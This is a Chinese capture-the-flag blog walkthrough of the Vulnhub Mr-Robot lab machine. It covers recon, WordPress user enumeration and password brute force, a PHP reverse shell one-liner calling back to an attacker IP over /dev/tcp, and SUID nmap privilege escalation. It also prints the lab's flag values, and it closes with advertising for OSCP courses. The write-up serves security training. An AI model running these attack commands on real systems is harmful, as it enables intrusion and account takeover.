打靶日记 Vulnhub Mr-Robot

admin 2025年4月13日20:31:41评论0 views字数 1785阅读5分57秒阅读模式

一、探测靶机IP(进行信息收集)

主机发现

arp-scan -l
打靶日记 Vulnhub Mr-Robot
nmap -sS -sV -T5 -p- 192.168.10.13 -A
打靶日记 Vulnhub Mr-Robot

二、进入网页

可以看到有三个命令但是都没有什么信息,但是这些视频很帅很帅,打完了还回去看了一遍

打靶日记 Vulnhub Mr-Robot
打靶日记 Vulnhub Mr-Robot
打靶日记 Vulnhub Mr-Robot
打靶日记 Vulnhub Mr-Robot

三、进行目录枚举

dirb http://192.168.10.13

爆了一个readme目录,robot.txt,还有wordpress登录界面,以及phpadmin

打靶日记 Vulnhub Mr-Robot
打靶日记 Vulnhub Mr-Robot

访问robots.txt发现有一个key-1-of-3.txt

打靶日记 Vulnhub Mr-Robot

再进行访问key-1-of-3.txt

打靶日记 Vulnhub Mr-Robot

073403c8a58a1f80d943455fb30724b9

还有fsocity.dic

访问后发现很多的像目录,用户,但是很多很多,也有像密码,先下载下来

打靶日记 Vulnhub Mr-Robot
nikto -h http://192.168.10.13
打靶日记 Vulnhub Mr-Robot

在登录界面发现可以通过用户名或电子邮件收到新密码链接,这时就可以通过不同的状态码来看有哪些用户名

打靶日记 Vulnhub Mr-Robot

四、爆破

抓包发送到测试器

打靶日记 Vulnhub Mr-Robot

导入fsocity.dic进行攻击

打靶日记 Vulnhub Mr-Robot

发现状态码为500的是Elliot,有四个不过都是大小写

打靶日记 Vulnhub Mr-Robot

知道用户名去爆破,但是太多了还有重复的,先进行去重,原本8万多行,太多了

awk '!seen[$0]++' 1.txt > pass.txt

再进行爆破,过滤200,发现只有ER28-0652重定向

打靶日记 Vulnhub Mr-Robot

去尝试登录,登录成功

打靶日记 Vulnhub Mr-Robot

五、反向shell+提权

经典文件上传

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.10.11/8888 0>&1'");?>
打靶日记 Vulnhub Mr-Robot

再访问,知道发生错误就会执行反向shell

192.168.10.13/wp-scan/404.php

记得开启监听

打靶日记 Vulnhub Mr-Robot

发现robot目录下有两个密码,key-2-of-3.txt无权限,password.raw-md5为c3fcd3d76192e4007dfb496cca67e13b

MD5解密https://hashes.com/en/decrypt/hash

打靶日记 Vulnhub Mr-Robot

abcdefghijklmnopqrstuvwxyz

打靶日记 Vulnhub Mr-Robot

得到了robot的密码,看看能不能切换用户,因为ssh服务是关闭的,别忘了要交互式终端

python -c "import pty;pty.spawn('/bin/bash')"
打靶日记 Vulnhub Mr-Robot

得到了key-2-of-3.txt,为822c73956184f694993bede3eb39f959

打靶日记 Vulnhub Mr-Robot

有密码尝试sudo提权失败,查看定时任务也没有发现什么

尝试suid提权

find / -perm -4000 -print 2>/dev/null
打靶日记 Vulnhub Mr-Robot

有nmap,尝试namp提权,但是由于用户不在sudo组里,如果在的话可以用这个方法

touch shell.sh
echo'os.execute("/bin/sh")' > shell.sh
sudo nmap --script=shell.sh

或者这个方法,某些旧版本 Nmap 的 Lua 解释器存在沙箱逃逸漏洞,可直接执行系统命令

nmap --script "os.execute('/bin/sh')" 192.168.10.13 #192.168.10.13是目标ip

即使没有sudo的权限还是可以通过namp提权

nmap --interactive
!sh
打靶日记 Vulnhub Mr-Robot

提权成功

打靶日记 Vulnhub Mr-Robot

第三个key 04787ddef27c3dee1ee161b21670b4e4

nmap --script "os.execute('/bin/sh')" 192.168.10.13 

END

oscp

有对红队工作感兴趣,或者有意报考oscp的师傅,可以考虑一下我们的培训课程,加我微信咨询,好处如下:

1.报考后课程随时可看,并且如果对考试没有信心,还可以留群跟第二批课程学习,不限次数时间,报考即是一辈子可看

2.200+台靶机及官方课程,lab靶机+域的内容团队泷老师和小羽老师会带大家全部过一遍,并且群内随时答疑,团队老师及群友都会积极解答,全天可答疑

3.目前可接受分期付款,无利息,最多分四个月,第一次付完即可观看视频

4.加入课程可享受工作推荐机会,优秀者可内推至红队

5.报考即送送官方文档中文版,以及kali命令详解中文版,纯人工翻译,版权为团队所有

打靶日记 Vulnhub Mr-Robot

知识星球

还可以加入我们的知识星球,包含cs二开,甲壳虫,红盟工具等,还有很多src挖掘资料包

打靶日记 Vulnhub Mr-Robot
打靶日记 Vulnhub Mr-Robot
打靶日记 Vulnhub Mr-Robot

原文始发于微信公众号(泷羽Sec-临观):打靶日记 Vulnhub Mr-Robot

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月13日20:31:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   打靶日记 Vulnhub Mr-Robothttps://cn-sec.com/archives/3951677.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息